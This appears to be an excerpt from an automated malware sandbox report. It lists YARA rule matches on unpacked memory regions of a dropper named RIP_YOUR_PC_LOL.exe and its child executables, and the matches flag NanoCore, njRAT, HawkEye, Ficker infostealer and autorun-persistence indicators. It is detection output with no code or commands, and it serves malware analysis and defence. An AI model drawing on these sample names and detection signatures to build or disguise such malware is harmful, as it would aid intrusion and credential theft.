                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 11.0.22.exe.5f65b6.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 4.2.healastounding.exe.4474268.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 4.2.healastounding.exe.4474268.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.2.healastounding.exe.4474268.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 9.0.Opus.exe.840000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 9.0.Opus.exe.840000.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 9.0.Opus.exe.840000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f19c0d.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f19c0d.15.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.596a627.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 11.0.22.exe.43de6f.19.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 11.0.22.exe.530edf.16.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 4.2.healastounding.exe.95312e.2.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.2.healastounding.exe.95312e.2.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 11.0.22.exe.43de6f.2.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 17.2.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 17.2.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 11.0.22.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 9.2.Opus.exe.3edeacc.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 9.2.Opus.exe.3edeacc.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.c8867b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 4.0.healastounding.exe.935129.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.935129.15.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 11.0.22.exe.43de6f.13.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 4.0.healastounding.exe.902324.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.gay.exe.d0000.1.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 8.0.gay.exe.d0000.1.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 8.0.gay.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 8.0.gay.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 9.0.Opus.exe.840000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 9.0.Opus.exe.840000.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 9.0.Opus.exe.840000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 11.0.22.exe.530edf.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 5.0.Pluto Panel.exe.f19c0d.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f19c0d.11.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 4.2.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.2.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 4.2.healastounding.exe.34865dc.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.2.healastounding.exe.34865dc.7.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 9.2.Opus.exe.5870000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 9.2.Opus.exe.5870000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 5.0.Pluto Panel.exe.f6fa72.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f6fa72.13.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 5.0.Pluto Panel.exe.f18208.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f18208.10.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 11.0.22.exe.5f65b6.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.d4dd52.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 4.0.healastounding.exe.95312e.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.95312e.7.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 9.2.Opus.exe.3ed9c96.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 9.2.Opus.exe.3ed9c96.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 9.2.Opus.exe.3ed9c96.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.c8867b.4.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.c8867b.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 4.0.healastounding.exe.95312e.2.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.95312e.2.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 9.2.Opus.exe.3edeacc.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 9.2.Opus.exe.3edeacc.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 9.2.Opus.exe.3ee30f5.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 9.2.Opus.exe.3ee30f5.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.0.healastounding.exe.95312e.7.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.95312e.7.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 5.0.Pluto Panel.exe.f18208.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f18208.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 5.0.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 5.0.Pluto Panel.exe.f6fa72.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f6fa72.9.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 17.0.mediaget.exe.ab0000.1.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 17.0.mediaget.exe.ab0000.1.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 11.0.22.exe.43de6f.7.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 4.0.healastounding.exe.95312e.13.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.95312e.13.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.18.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 11.0.22.exe.400000.18.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 5.0.Pluto Panel.exe.f6fa72.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f6fa72.7.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 11.0.22.exe.530edf.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5839748.8.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 6.0.test.exe.da0000.2.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 11.0.22.exe.530edf.22.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1fdd5e1.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 4.2.healastounding.exe.902324.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 4.2.healastounding.exe.902324.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.2.healastounding.exe.902324.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.d4dd52.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.c8867b.4.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 11.0.22.exe.530edf.16.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 6.0.test.exe.da0000.3.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5731eca.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5731eca.7.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5707591.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5707591.1.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 4.0.healastounding.exe.935129.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.935129.5.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.206ac1d.13.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 5.0.Pluto Panel.exe.f19c0d.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f19c0d.6.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5a2fcfe.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 5.0.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 4.0.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 5.0.Pluto Panel.exe.f19c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f19c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 11.0.22.exe.530edf.11.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.19.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 9.2.Opus.exe.5b04629.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 9.2.Opus.exe.5b04629.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 15.2.0fd7de5367376231a788872005d7ed4f.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f86e6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f86e6.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
